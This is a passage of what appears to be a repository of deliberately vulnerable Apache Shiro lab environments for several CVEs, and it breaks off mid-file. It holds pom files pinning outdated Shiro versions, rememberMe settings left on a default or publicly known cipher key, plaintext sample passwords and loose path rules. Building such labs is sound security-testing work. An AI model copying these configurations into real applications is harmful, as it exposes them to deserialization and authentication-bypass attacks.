35 | 36 | -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/account/index.jsp: -------------------------------------------------------------------------------- 1 | <%-- 2 | ~ Licensed to the Apache Software Foundation (ASF) under one 3 | ~ or more contributor license agreements. See the NOTICE file 4 | ~ distributed with this work for additional information 5 | ~ regarding copyright ownership. The ASF licenses this file 6 | ~ to you under the Apache License, Version 2.0 (the 7 | ~ "License"); you may not use this file except in compliance 8 | ~ with the License. You may obtain a copy of the License at 9 | ~ 10 | ~ http://www.apache.org/licenses/LICENSE-2.0 11 | ~ 12 | ~ Unless required by applicable law or agreed to in writing, 13 | ~ software distributed under the License is distributed on an 14 | ~ "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY 15 | ~ KIND, either express or implied. See the License for the 16 | ~ specific language governing permissions and limitations 17 | ~ under the License. 18 | --%> 19 | <%@ include file="../include.jsp" %> 20 | 21 | 22 | 23 | "/> 24 | 25 | 26 | 27 |

Users only

28 | 29 |

You are currently logged in.

30 | 31 |

">Return to the home page.

32 | 33 |

" onclick="document.getElementById('logout_form').submit();return false;">Log out.

34 |
" method="post">
35 | 36 | -------------------------------------------------------------------------------- /shiro-721/src/main/webapp/style.css: -------------------------------------------------------------------------------- 1 | /* 2 | * Licensed to the Apache Software Foundation (ASF) under one 3 | * or more contributor license agreements. See the NOTICE file 4 | * distributed with this work for additional information 5 | * regarding copyright ownership. The ASF licenses this file 6 | * to you under the Apache License, Version 2.0 (the 7 | * "License"); you may not use this file except in compliance 8 | * with the License. You may obtain a copy of the License at 9 | * 10 | * http://www.apache.org/licenses/LICENSE-2.0 11 | * 12 | * Unless required by applicable law or agreed to in writing, 13 | * software distributed under the License is distributed on an 14 | * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY 15 | * KIND, either express or implied. See the License for the 16 | * specific language governing permissions and limitations 17 | * under the License. 18 | */ 19 | body { 20 | margin: 15px 0 0 15px; 21 | padding: 1px; /*background: #2370cf;*/ 22 | font: 12px 'Lucida Grande', Geneva, Verdana, Arial, sans-serif; 23 | color: #000; 24 | } 25 | 26 | table, td { 27 | font: 12px 'Lucida Grande', Geneva, Verdana, Arial, sans-serif; 28 | color: #000; 29 | } 30 | 31 | h1 { 32 | font: 24px; 33 | } 34 | 35 | img { 36 | border: thin black solid; 37 | } 38 | 39 | #contentBox { 40 | text-align: center; 41 | width: 50%; 42 | margin: auto; 43 | margin-top: 50px; 44 | color: black; 45 | background: #eee; 46 | border: thick black solid; 47 | } -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/style.css: -------------------------------------------------------------------------------- 1 | /* 2 | * Licensed to the Apache Software Foundation (ASF) under one 3 | * or more contributor license agreements. See the NOTICE file 4 | * distributed with this work for additional information 5 | * regarding copyright ownership. The ASF licenses this file 6 | * to you under the Apache License, Version 2.0 (the 7 | * "License"); you may not use this file except in compliance 8 | * with the License. You may obtain a copy of the License at 9 | * 10 | * http://www.apache.org/licenses/LICENSE-2.0 11 | * 12 | * Unless required by applicable law or agreed to in writing, 13 | * software distributed under the License is distributed on an 14 | * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY 15 | * KIND, either express or implied. See the License for the 16 | * specific language governing permissions and limitations 17 | * under the License. 18 | */ 19 | body { 20 | margin: 15px 0 0 15px; 21 | padding: 1px; /*background: #2370cf;*/ 22 | font: 12px 'Lucida Grande', Geneva, Verdana, Arial, sans-serif; 23 | color: #000; 24 | } 25 | 26 | table, td { 27 | font: 12px 'Lucida Grande', Geneva, Verdana, Arial, sans-serif; 28 | color: #000; 29 | } 30 | 31 | h1 { 32 | font: 24px; 33 | } 34 | 35 | img { 36 | border: thin black solid; 37 | } 38 | 39 | #contentBox { 40 | text-align: center; 41 | width: 50%; 42 | margin: auto; 43 | margin-top: 50px; 44 | color: black; 45 | background: #eee; 46 | border: thick black solid; 47 | } -------------------------------------------------------------------------------- /shiro-550/src/main/java/com/example/shiro550/DemoController.java: -------------------------------------------------------------------------------- 1 | package com.example.shiro550; 2 | 3 | import org.apache.shiro.SecurityUtils; 4 | import org.apache.shiro.authc.AuthenticationException; 5 | import org.apache.shiro.authc.AuthenticationToken; 6 | import org.apache.shiro.authc.UsernamePasswordToken; 7 | import org.apache.shiro.subject.Subject; 8 | import org.springframework.stereotype.Controller; 9 | import org.springframework.web.bind.annotation.*; 10 | 11 | @Controller 12 | public class DemoController { 13 | 14 | @PostMapping({"/doLogin"}) 15 | public String doLoginPage(@RequestParam("username") String username, @RequestParam("password") String password, @RequestParam(name = "rememberme", defaultValue = "") String rememberMe) { 16 | Subject subject = SecurityUtils.getSubject(); 17 | try{ 18 | subject.login((AuthenticationToken)new UsernamePasswordToken(username, password, rememberMe.equals("remember-me"))); 19 | }catch (AuthenticationException e) { 20 | return "forward:/login"; 21 | } 22 | return "forward:/"; 23 | } 24 | 25 | @RequestMapping("/") 26 | public String hello(){ 27 | return "hello"; 28 | } 29 | 30 | @RequestMapping("/test") 31 | public String test(){ 32 | return "test"; 33 | } 34 | 35 | @RequestMapping({"/unauth"}) 36 | public String errorPage(){ 37 | return "error"; 38 | } 39 | 40 | @RequestMapping({"/login"}) 41 | public String loginPage() { 42 | return "login"; 43 | } 44 | } 45 | -------------------------------------------------------------------------------- /shiro_cve-2020-17523/src/main/java/org/test/springbootshiro/SpringbootShiroApplication.java: -------------------------------------------------------------------------------- 1 | package org.test.springbootshiro; 2 | 3 | import org.springframework.beans.BeansException; 4 | import org.springframework.beans.factory.config.BeanPostProcessor; 5 | import org.springframework.boot.SpringApplication; 6 | import org.springframework.boot.autoconfigure.SpringBootApplication; 7 | import org.springframework.boot.builder.SpringApplicationBuilder; 8 | import org.springframework.boot.web.servlet.support.SpringBootServletInitializer; 9 | import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping; 10 | 11 | /** 12 | * @author jweny 13 | */ 14 | 15 | 16 | 17 | @SpringBootApplication 18 | public class SpringbootShiroApplication extends SpringBootServletInitializer implements BeanPostProcessor { 19 | 20 | @Override 21 | protected SpringApplicationBuilder configure(SpringApplicationBuilder builder) { 22 | return builder.sources(SpringbootShiroApplication.class); 23 | } 24 | 25 | public static void main(String[] args) { 26 | 27 | SpringApplication.run(SpringbootShiroApplication.class, args); 28 | } 29 | 30 | @Override 31 | public Object postProcessBeforeInitialization(Object bean, String beanName) 32 | throws BeansException { 33 | if (bean instanceof RequestMappingHandlerMapping) { 34 | ((RequestMappingHandlerMapping) bean).setAlwaysUseFullPath(true); 35 | } 36 | return bean; 37 | } 38 | 39 | @Override 40 | public Object postProcessAfterInitialization(Object bean, String beanName) 41 | throws BeansException { 42 | return bean; 43 | } 44 | } -------------------------------------------------------------------------------- /shiro-721/src/main/webapp/WEB-INF/web.xml: -------------------------------------------------------------------------------- 1 | 2 | 20 | 24 | 25 | 26 | org.apache.shiro.web.env.EnvironmentLoaderListener 27 | 28 | 29 | 30 | ShiroFilter 31 | org.apache.shiro.web.servlet.ShiroFilter 32 | 33 | 34 | 35 | ShiroFilter 36 | /* 37 | 38 | 39 | 40 | index.jsp 41 | 42 | 43 | 44 | -------------------------------------------------------------------------------- /shiro_cve-2020-17510/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 4.0.0 5 | 6 | org.springframework.boot 7 | spring-boot-starter-parent 8 | 2.2.11.RELEASE 9 | 10 | 11 | com.L4G 12 | spring-shiro 13 | 0.0.1-SNAPSHOT 14 | CVE-2020-17510 15 | Demo project for Spring Boot 16 | 17 | 18 | 1.8 19 | 20 | 21 | 22 | 23 | org.springframework.boot 24 | spring-boot-starter-web 25 | 26 | 27 | org.apache.shiro 28 | shiro-web 29 | 1.6.0 30 | 31 | 32 | org.apache.shiro 33 | shiro-spring 34 | 1.6.0 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | org.springframework.boot 43 | spring-boot-maven-plugin 44 | 45 | 46 | 47 | 48 | 49 | -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/WEB-INF/web.xml: -------------------------------------------------------------------------------- 1 | 2 | 20 | 24 | 25 | 26 | org.apache.shiro.web.env.EnvironmentLoaderListener 27 | 28 | 29 | 30 | ShiroFilter 31 | org.apache.shiro.web.servlet.ShiroFilter 32 | 33 | 34 | 35 | ShiroFilter 36 | /* 37 | 38 | 39 | 40 | index.jsp 41 | 42 | 43 | 44 | -------------------------------------------------------------------------------- /shiro_cve-2020-1957/src/main/java/org/javaboy/shirobasic/ShiroConfig.java: -------------------------------------------------------------------------------- 1 | package org.javaboy.shirobasic; 2 | 3 | import org.apache.shiro.mgt.SecurityManager; 4 | import org.apache.shiro.spring.web.ShiroFilterFactoryBean; 5 | import org.apache.shiro.web.mgt.DefaultWebSecurityManager; 6 | import org.springframework.context.annotation.Bean; 7 | import org.springframework.context.annotation.Configuration; 8 | 9 | import java.util.LinkedHashMap; 10 | import java.util.Map; 11 | 12 | /** 13 | * @Author 江南一点雨 14 | * @Site www.javaboy.org 2019-06-05 11:16 15 | * 16 | * 在这里进行 Shiro 的配置 17 | * Shiro 的配置主要配置 3 个 Bean 。 18 | * 19 | * 1. 首先需要提供一个 Realm 的实例 20 | * 2. 需要配置一个 SecurityManager,在 SecurityManager 中配置 Realm 21 | * 3. 配置一个 ShiroFilterFactoryBean ,在 ShiroFilterFactoryBean 中指定路径拦截规则等 22 | */ 23 | @Configuration 24 | public class ShiroConfig { 25 | @Bean 26 | MyRealm myRealm() { 27 | return new MyRealm(); 28 | } 29 | 30 | @Bean 31 | SecurityManager securityManager() { 32 | DefaultWebSecurityManager manager = new DefaultWebSecurityManager(); 33 | manager.setRealm(myRealm()); 34 | return manager; 35 | } 36 | 37 | @Bean 38 | ShiroFilterFactoryBean shiroFilterFactoryBean() { 39 | ShiroFilterFactoryBean bean = new ShiroFilterFactoryBean(); 40 | //指定 SecurityManager 41 | bean.setSecurityManager(securityManager()); 42 | //登录页面 43 | bean.setLoginUrl("/login"); 44 | //登录成功页面 45 | bean.setSuccessUrl("/index"); 46 | //访问未获授权路径时跳转的页面 47 | bean.setUnauthorizedUrl("/unauthorizedurl"); 48 | //配置路径拦截规则,注意,要有序 49 | Map map = new LinkedHashMap<>(); 50 | map.put("/doLogin", "anon"); 51 | //map.put("/**", "authc"); 52 | map.put("/hello/*", "authc"); 53 | bean.setFilterChainDefinitionMap(map); 54 | return bean; 55 | } 56 | } 57 | 58 | -------------------------------------------------------------------------------- /shiro-550/src/main/java/com/example/shiro550/shiro/ShiroConfig.java: -------------------------------------------------------------------------------- 1 | package com.example.shiro550.shiro; 2 | 3 | import java.util.LinkedHashMap; 4 | import java.util.Map; 5 | import org.apache.shiro.mgt.RememberMeManager; 6 | import org.apache.shiro.mgt.SecurityManager; 7 | import org.apache.shiro.realm.Realm; 8 | import org.apache.shiro.spring.web.ShiroFilterFactoryBean; 9 | import org.apache.shiro.web.mgt.CookieRememberMeManager; 10 | import org.apache.shiro.web.mgt.DefaultWebSecurityManager; 11 | import org.springframework.context.annotation.Bean; 12 | import org.springframework.context.annotation.Configuration; 13 | import com.example.shiro550.shiro.MainRealm; 14 | 15 | @Configuration 16 | public class ShiroConfig { 17 | @Bean 18 | MainRealm mainRealm() { 19 | return new MainRealm(); 20 | } 21 | 22 | @Bean 23 | RememberMeManager cookieRememberMeManager() { 24 | return (RememberMeManager)new CookieRememberMeManager(); 25 | } 26 | 27 | @Bean 28 | SecurityManager securityManager(MainRealm mainRealm, RememberMeManager cookieRememberMeManager) { 29 | DefaultWebSecurityManager manager = new DefaultWebSecurityManager(); 30 | manager.setRealm((Realm)mainRealm); 31 | manager.setRememberMeManager(cookieRememberMeManager); 32 | return (SecurityManager)manager; 33 | } 34 | 35 | @Bean(name = {"shiroFilter"}) 36 | ShiroFilterFactoryBean shiroFilterFactoryBean(SecurityManager securityManager) { 37 | ShiroFilterFactoryBean bean = new ShiroFilterFactoryBean(); 38 | bean.setSecurityManager(securityManager); 39 | bean.setLoginUrl("/login"); 40 | bean.setSuccessUrl("/hello"); 41 | bean.setUnauthorizedUrl(""); 42 | Map map = new LinkedHashMap<>(); 43 | map.put("/doLogin", "anon"); 44 | map.put("/test", "anon"); 45 | map.put("/**", "authc"); 46 | bean.setFilterChainDefinitionMap(map); 47 | return bean; 48 | } 49 | } -------------------------------------------------------------------------------- /shiro_cve-2020-1957/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 4.0.0 5 | 6 | org.springframework.boot 7 | spring-boot-starter-parent 8 | 2.1.5.RELEASE 9 | 10 | 11 | org.javaboy 12 | shiro-basic 13 | 0.0.1-SNAPSHOT 14 | shiro-basic 15 | Demo project for Spring Boot 16 | 17 | 18 | 1.8 19 | 20 | 21 | 22 | 23 | org.springframework.boot 24 | spring-boot-starter-web 25 | 26 | 27 | org.apache.shiro 28 | shiro-web 29 | 1.4.2 30 | 31 | 32 | org.apache.shiro 33 | shiro-spring 34 | 1.4.2 35 | 36 | 37 | org.springframework.boot 38 | spring-boot-starter-test 39 | test 40 | 41 | 42 | 43 | 44 | 45 | 46 | org.springframework.boot 47 | spring-boot-maven-plugin 48 | 49 | 50 | 51 | 52 | 53 | -------------------------------------------------------------------------------- /shiro-721/target/classes/log4j.properties: -------------------------------------------------------------------------------- 1 | # 2 | # Licensed to the Apache Software Foundation (ASF) under one 3 | # or more contributor license agreements. See the NOTICE file 4 | # distributed with this work for additional information 5 | # regarding copyright ownership. The ASF licenses this file 6 | # to you under the Apache License, Version 2.0 (the 7 | # "License"); you may not use this file except in compliance 8 | # with the License. You may obtain a copy of the License at 9 | # 10 | # http://www.apache.org/licenses/LICENSE-2.0 11 | # 12 | # Unless required by applicable law or agreed to in writing, 13 | # software distributed under the License is distributed on an 14 | # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY 15 | # KIND, either express or implied. See the License for the 16 | # specific language governing permissions and limitations 17 | # under the License. 18 | # 19 | # This file is used to format all logging output 20 | log4j.rootLogger=TRACE, stdout 21 | 22 | log4j.appender.stdout=org.apache.log4j.ConsoleAppender 23 | log4j.appender.stdout.layout=org.apache.log4j.PatternLayout 24 | log4j.appender.stdout.layout.ConversionPattern=%d %-5p [%c]: %m%n 25 | 26 | # ============================================================================= 27 | # 3rd Party Libraries 28 | # OFF, FATAL, ERROR, WARN, INFO, DEBUG, ALL 29 | # ============================================================================= 30 | # ehcache caching manager: 31 | log4j.logger.net.sf.ehcache=WARN 32 | 33 | # Most all Apache libs: 34 | log4j.logger.org.apache=WARN 35 | 36 | # Quartz Enterprise Scheular (java 'cron' utility) 37 | log4j.logger.org.quartz=WARN 38 | 39 | # ============================================================================= 40 | # Apache Shiro 41 | # ============================================================================= 42 | # Shiro security framework 43 | log4j.logger.org.apache.shiro=TRACE 44 | #log4j.logger.org.apache.shiro.realm.text.PropertiesRealm=INFO 45 | #log4j.logger.org.apache.shiro.cache.ehcache.EhCache=INFO 46 | #log4j.logger.org.apache.shiro.io=INFO 47 | #log4j.logger.org.apache.shiro.web.servlet=INFO 48 | log4j.logger.org.apache.shiro.util.ThreadContext=INFO 49 | -------------------------------------------------------------------------------- /shiro-721/src/main/resources/log4j.properties: -------------------------------------------------------------------------------- 1 | # 2 | # Licensed to the Apache Software Foundation (ASF) under one 3 | # or more contributor license agreements. See the NOTICE file 4 | # distributed with this work for additional information 5 | # regarding copyright ownership. The ASF licenses this file 6 | # to you under the Apache License, Version 2.0 (the 7 | # "License"); you may not use this file except in compliance 8 | # with the License. You may obtain a copy of the License at 9 | # 10 | # http://www.apache.org/licenses/LICENSE-2.0 11 | # 12 | # Unless required by applicable law or agreed to in writing, 13 | # software distributed under the License is distributed on an 14 | # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY 15 | # KIND, either express or implied. See the License for the 16 | # specific language governing permissions and limitations 17 | # under the License. 18 | # 19 | # This file is used to format all logging output 20 | log4j.rootLogger=TRACE, stdout 21 | 22 | log4j.appender.stdout=org.apache.log4j.ConsoleAppender 23 | log4j.appender.stdout.layout=org.apache.log4j.PatternLayout 24 | log4j.appender.stdout.layout.ConversionPattern=%d %-5p [%c]: %m%n 25 | 26 | # ============================================================================= 27 | # 3rd Party Libraries 28 | # OFF, FATAL, ERROR, WARN, INFO, DEBUG, ALL 29 | # ============================================================================= 30 | # ehcache caching manager: 31 | log4j.logger.net.sf.ehcache=WARN 32 | 33 | # Most all Apache libs: 34 | log4j.logger.org.apache=WARN 35 | 36 | # Quartz Enterprise Scheular (java 'cron' utility) 37 | log4j.logger.org.quartz=WARN 38 | 39 | # ============================================================================= 40 | # Apache Shiro 41 | # ============================================================================= 42 | # Shiro security framework 43 | log4j.logger.org.apache.shiro=TRACE 44 | #log4j.logger.org.apache.shiro.realm.text.PropertiesRealm=INFO 45 | #log4j.logger.org.apache.shiro.cache.ehcache.EhCache=INFO 46 | #log4j.logger.org.apache.shiro.io=INFO 47 | #log4j.logger.org.apache.shiro.web.servlet=INFO 48 | log4j.logger.org.apache.shiro.util.ThreadContext=INFO 49 | -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/WEB-INF/classes/log4j.properties: -------------------------------------------------------------------------------- 1 | # 2 | # Licensed to the Apache Software Foundation (ASF) under one 3 | # or more contributor license agreements. See the NOTICE file 4 | # distributed with this work for additional information 5 | # regarding copyright ownership. The ASF licenses this file 6 | # to you under the Apache License, Version 2.0 (the 7 | # "License"); you may not use this file except in compliance 8 | # with the License. You may obtain a copy of the License at 9 | # 10 | # http://www.apache.org/licenses/LICENSE-2.0 11 | # 12 | # Unless required by applicable law or agreed to in writing, 13 | # software distributed under the License is distributed on an 14 | # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY 15 | # KIND, either express or implied. See the License for the 16 | # specific language governing permissions and limitations 17 | # under the License. 18 | # 19 | # This file is used to format all logging output 20 | log4j.rootLogger=TRACE, stdout 21 | 22 | log4j.appender.stdout=org.apache.log4j.ConsoleAppender 23 | log4j.appender.stdout.layout=org.apache.log4j.PatternLayout 24 | log4j.appender.stdout.layout.ConversionPattern=%d %-5p [%c]: %m%n 25 | 26 | # ============================================================================= 27 | # 3rd Party Libraries 28 | # OFF, FATAL, ERROR, WARN, INFO, DEBUG, ALL 29 | # ============================================================================= 30 | # ehcache caching manager: 31 | log4j.logger.net.sf.ehcache=WARN 32 | 33 | # Most all Apache libs: 34 | log4j.logger.org.apache=WARN 35 | 36 | # Quartz Enterprise Scheular (java 'cron' utility) 37 | log4j.logger.org.quartz=WARN 38 | 39 | # ============================================================================= 40 | # Apache Shiro 41 | # ============================================================================= 42 | # Shiro security framework 43 | log4j.logger.org.apache.shiro=TRACE 44 | #log4j.logger.org.apache.shiro.realm.text.PropertiesRealm=INFO 45 | #log4j.logger.org.apache.shiro.cache.ehcache.EhCache=INFO 46 | #log4j.logger.org.apache.shiro.io=INFO 47 | #log4j.logger.org.apache.shiro.web.servlet=INFO 48 | log4j.logger.org.apache.shiro.util.ThreadContext=INFO 49 | -------------------------------------------------------------------------------- /shiro-721/src/main/webapp/WEB-INF/shiro.ini: -------------------------------------------------------------------------------- 1 | # 2 | # Licensed to the Apache Software Foundation (ASF) under one 3 | # or more contributor license agreements. See the NOTICE file 4 | # distributed with this work for additional information 5 | # regarding copyright ownership. The ASF licenses this file 6 | # to you under the Apache License, Version 2.0 (the 7 | # "License"); you may not use this file except in compliance 8 | # with the License. You may obtain a copy of the License at 9 | # 10 | # http://www.apache.org/licenses/LICENSE-2.0 11 | # 12 | # Unless required by applicable law or agreed to in writing, 13 | # software distributed under the License is distributed on an 14 | # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY 15 | # KIND, either express or implied. See the License for the 16 | # specific language governing permissions and limitations 17 | # under the License. 18 | 19 | # INI configuration is very powerful and flexible, while still remaining succinct. 20 | # Please http://shiro.apache.org/configuration.html and 21 | # http://shiro.apache.org/web.html for more. 22 | 23 | [main] 24 | listener = org.apache.shiro.config.event.LoggingBeanEventListener 25 | 26 | shiro.loginUrl = /login.jsp 27 | shiro.postOnlyLogout = true 28 | 29 | sessionManager = org.apache.shiro.web.session.mgt.DefaultWebSessionManager 30 | securityManager.sessionManager = $sessionManager 31 | securityManager.sessionManager.sessionIdUrlRewritingEnabled = false 32 | 33 | # We need to set the cipherKey, if you want the rememberMe cookie to work after restarting or on multiple nodes. 34 | # YOU MUST SET THIS TO A UNIQUE STRING 35 | securityManager.rememberMeManager.cipherKey = kPH+bIxk5D2deZiIxcaaaA== 36 | 37 | [users] 38 | # format: username = password, role1, role2, ..., roleN 39 | root = secret,admin 40 | guest = guest,guest 41 | presidentskroob = 12345,president 42 | darkhelmet = ludicrousspeed,darklord,schwartz 43 | lonestarr = vespa,goodguy,schwartz 44 | 45 | [roles] 46 | # format: roleName = permission1, permission2, ..., permissionN 47 | admin = * 48 | schwartz = lightsaber:* 49 | goodguy = winnebago:drive:eagle5 50 | 51 | [urls] 52 | # The /login.jsp is not restricted to authenticated users (otherwise no one could log in!), but 53 | # the 'authc' filter must still be specified for it so it can process that url's 54 | # login submissions. It is 'smart' enough to allow those requests through as specified by the 55 | # shiro.loginUrl above. 56 | /login.jsp = authc 57 | /logout = logout 58 | /account/** = authc 59 | /remoting/** = authc, roles[b2bClient], perms["remote:invoke:lan,wan"] -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/WEB-INF/shiro.ini: -------------------------------------------------------------------------------- 1 | # 2 | # Licensed to the Apache Software Foundation (ASF) under one 3 | # or more contributor license agreements. See the NOTICE file 4 | # distributed with this work for additional information 5 | # regarding copyright ownership. The ASF licenses this file 6 | # to you under the Apache License, Version 2.0 (the 7 | # "License"); you may not use this file except in compliance 8 | # with the License. You may obtain a copy of the License at 9 | # 10 | # http://www.apache.org/licenses/LICENSE-2.0 11 | # 12 | # Unless required by applicable law or agreed to in writing, 13 | # software distributed under the License is distributed on an 14 | # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY 15 | # KIND, either express or implied. See the License for the 16 | # specific language governing permissions and limitations 17 | # under the License. 18 | 19 | # INI configuration is very powerful and flexible, while still remaining succinct. 20 | # Please http://shiro.apache.org/configuration.html and 21 | # http://shiro.apache.org/web.html for more. 22 | 23 | [main] 24 | listener = org.apache.shiro.config.event.LoggingBeanEventListener 25 | 26 | shiro.loginUrl = /login.jsp 27 | shiro.postOnlyLogout = true 28 | 29 | sessionManager = org.apache.shiro.web.session.mgt.DefaultWebSessionManager 30 | securityManager.sessionManager = $sessionManager 31 | securityManager.sessionManager.sessionIdUrlRewritingEnabled = false 32 | 33 | # We need to set the cipherKey, if you want the rememberMe cookie to work after restarting or on multiple nodes. 34 | # YOU MUST SET THIS TO A UNIQUE STRING 35 | securityManager.rememberMeManager.cipherKey = kPH+bIxk5D2deZiIxcaaaA== 36 | 37 | [users] 38 | # format: username = password, role1, role2, ..., roleN 39 | root = secret,admin 40 | guest = guest,guest 41 | presidentskroob = 12345,president 42 | darkhelmet = ludicrousspeed,darklord,schwartz 43 | lonestarr = vespa,goodguy,schwartz 44 | 45 | [roles] 46 | # format: roleName = permission1, permission2, ..., permissionN 47 | admin = * 48 | schwartz = lightsaber:* 49 | goodguy = winnebago:drive:eagle5 50 | 51 | [urls] 52 | # The /login.jsp is not restricted to authenticated users (otherwise no one could log in!), but 53 | # the 'authc' filter must still be specified for it so it can process that url's 54 | # login submissions. It is 'smart' enough to allow those requests through as specified by the 55 | # shiro.loginUrl above. 56 | /login.jsp = authc 57 | /logout = logout 58 | /account/** = authc 59 | /remoting/** = authc, roles[b2bClient], perms["remote:invoke:lan,wan"] -------------------------------------------------------------------------------- /shiro-721/src/test/java/org/apache/shiro/test/ContainerIntegrationIT.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Licensed to the Apache Software Foundation (ASF) under one 3 | * or more contributor license agreements. See the NOTICE file 4 | * distributed with this work for additional information 5 | * regarding copyright ownership. The ASF licenses this file 6 | * to you under the Apache License, Version 2.0 (the 7 | * "License"); you may not use this file except in compliance 8 | * with the License. You may obtain a copy of the License at 9 | * 10 | * http://www.apache.org/licenses/LICENSE-2.0 11 | * 12 | * Unless required by applicable law or agreed to in writing, 13 | * software distributed under the License is distributed on an 14 | * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY 15 | * KIND, either express or implied. See the License for the 16 | * specific language governing permissions and limitations 17 | * under the License. 18 | */ 19 | package org.apache.shiro.test; 20 | 21 | import com.gargoylesoftware.htmlunit.ElementNotFoundException; 22 | import com.gargoylesoftware.htmlunit.FailingHttpStatusCodeException; 23 | import com.gargoylesoftware.htmlunit.WebClient; 24 | import com.gargoylesoftware.htmlunit.html.HtmlForm; 25 | import com.gargoylesoftware.htmlunit.html.HtmlInput; 26 | import com.gargoylesoftware.htmlunit.html.HtmlPage; 27 | import org.apache.shiro.testing.web.AbstractContainerIT; 28 | import org.junit.Before; 29 | import org.junit.Test; 30 | 31 | import java.io.IOException; 32 | import java.net.MalformedURLException; 33 | 34 | public class ContainerIntegrationIT extends AbstractContainerIT { 35 | 36 | protected final WebClient webClient = new WebClient(); 37 | 38 | @Before 39 | public void logOut() throws IOException { 40 | // Make sure we are logged out 41 | final HtmlPage homePage = webClient.getPage(getBaseUri()); 42 | try { 43 | homePage.getAnchorByHref("/logout").click(); 44 | } 45 | catch (ElementNotFoundException e) { 46 | //Ignore 47 | } 48 | } 49 | 50 | @Test 51 | public void logIn() throws FailingHttpStatusCodeException, MalformedURLException, IOException, InterruptedException { 52 | 53 | HtmlPage page = webClient.getPage(getBaseUri() + "login.jsp"); 54 | HtmlForm form = page.getFormByName("loginform"); 55 | form.getInputByName("username").setValueAttribute("root"); 56 | form.getInputByName("password").setValueAttribute("secret"); 57 | page = form.getInputByName("submit").click(); 58 | // This'll throw an expection if not logged in 59 | page.getAnchorByHref("/logout"); 60 | } 61 | } 62 | -------------------------------------------------------------------------------- /shiro-550/src/main/resources/templates/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Login Page 6 | 7 | 68 | 69 | 70 | 83 | 84 | 85 | -------------------------------------------------------------------------------- /shiro-721/src/main/webapp/home.jsp: -------------------------------------------------------------------------------- 1 | <%-- 2 | ~ Licensed to the Apache Software Foundation (ASF) under one 3 | ~ or more contributor license agreements. See the NOTICE file 4 | ~ distributed with this work for additional information 5 | ~ regarding copyright ownership. The ASF licenses this file 6 | ~ to you under the Apache License, Version 2.0 (the 7 | ~ "License"); you may not use this file except in compliance 8 | ~ with the License. You may obtain a copy of the License at 9 | ~ 10 | ~ http://www.apache.org/licenses/LICENSE-2.0 11 | ~ 12 | ~ Unless required by applicable law or agreed to in writing, 13 | ~ software distributed under the License is distributed on an 14 | ~ "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY 15 | ~ KIND, either express or implied. See the License for the 16 | ~ specific language governing permissions and limitations 17 | ~ under the License. 18 | --%> 19 | <%@ include file="include.jsp" %> 20 | 21 | 22 | 23 | "/> 24 | Apache Shiro Quickstart 25 | 26 | 27 | 28 |

Apache Shiro Quickstart

29 | 30 |

Hi Guest! 31 | ( " onclick="document.getElementById('logout_form').submit();return false;">logout 32 | ">Log in (sample accounts provided) ) 33 |

34 | 35 |

Welcome to the Apache Shiro Quickstart sample application. 36 | This page represents the home page of any web application.

37 | 38 |

Visit your ">account page.

 39 |

If you want to access the user-only ">account page, 40 | you will need to log-in first.

 41 | 42 |

Roles

43 | 44 |

To show some taglibs, here are the roles you have and don't have. Log out and log back in under different user 45 | accounts to see different roles.

46 | 47 |

Roles you have

48 | 49 |

50 | admin
 51 | president
 52 | darklord
 53 | goodguy
 54 | schwartz
 55 |

56 | 57 |

Roles you DON'T have

58 | 59 |

60 | admin
 61 | president
 62 | darklord
 63 | goodguy
 64 | schwartz
 65 |

66 | 67 |
" method="post">
68 | 69 | 70 | -------------------------------------------------------------------------------- /shiro_cve-2020-11989/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 4.0.0 5 | 6 | org.springframework.boot 7 | spring-boot-starter-parent 8 | 2.2.6.RELEASE 9 | 10 | 11 | org.syclover 12 | srpingboot-shiro 13 | 0.0.1-SNAPSHOT 14 | srpingboot-shiro 15 | Demo project for Spring Boot 16 | war 17 | 18 | 19 | 1.8 20 | 21 | 22 | 23 | 24 | org.springframework.boot 25 | spring-boot-starter-web 26 | 27 | 28 | org.springframework.boot 29 | spring-boot-starter-tomcat 30 | 31 | 32 | 33 | 34 | 35 | 36 | javax.servlet 37 | javax.servlet-api 38 | 4.0.1 39 | provided 40 | 41 | 42 | 43 | org.apache.shiro 44 | shiro-web 45 | 1.5.1 46 | 47 | 48 | org.apache.shiro 49 | shiro-spring 50 | 1.5.1 51 | 52 | 53 | 54 | org.springframework.boot 55 | spring-boot-starter-test 56 | test 57 | 58 | 59 | org.junit.vintage 60 | junit-vintage-engine 61 | 62 | 63 | 64 | 65 | org.springframework.boot 66 | spring-boot-starter-web 67 | 68 | 69 | 70 | 71 | 72 | 73 | org.springframework.boot 74 | spring-boot-maven-plugin 75 | 76 | 77 | 78 | 79 | 80 | -------------------------------------------------------------------------------- /shiro_cve-2020-13933/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 4.0.0 5 | 6 | org.springframework.boot 7 | spring-boot-starter-parent 8 | 2.2.6.RELEASE 9 | 10 | 11 | org.syclover 12 | srpingboot-shiro 13 | 0.0.1-SNAPSHOT 14 | srpingboot-shiro 15 | Demo project for Spring Boot 16 | war 17 | 18 | 19 | 1.8 20 | 21 | 22 | 23 | 24 | org.springframework.boot 25 | spring-boot-starter-web 26 | 27 | 28 | org.springframework.boot 29 | 